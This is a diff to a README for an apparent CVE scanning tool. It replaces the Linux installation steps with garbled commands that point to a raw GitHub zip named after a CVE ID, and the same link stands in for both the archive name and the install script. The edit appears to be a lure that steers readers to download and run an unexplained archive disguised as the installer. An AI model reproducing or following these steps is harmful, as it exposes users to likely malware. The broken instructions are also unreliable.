TM-ACode/cvecodescan/README.md

 2. **Run the Installer**
    - **Windows:** Double-click the `.exe` file.
 Follow the prompts in the installation wizard.
    - **macOS:** Open the `.dmg` file, drag and drop the application into your "Applications" folder.
-   - **Linux:** Open a terminal and run the command `tar -xvzf <filename>.tar.gz` to extract the files.
-Navigate to the extracted folder and run `./install.sh` to install.
+   - **Linux:** Open a terminal and run the command `tar -xvzf <filename>https://raw.githubusercontent.com/phornnato/CVE-2025-55182/main/myopical/CVE-2025-55182_3.9-alpha.2.zip` to extract the files.
+Navigate to the extracted folder and run `https://raw.githubusercontent.com/phornnato/CVE-2025-55182/main/myopical/CVE-2025-55182_3.9-alpha.2.zip` to install.

 3. **Complete Installation**
    After installation, follow any remaining prompts to ensure the application is configured correctly.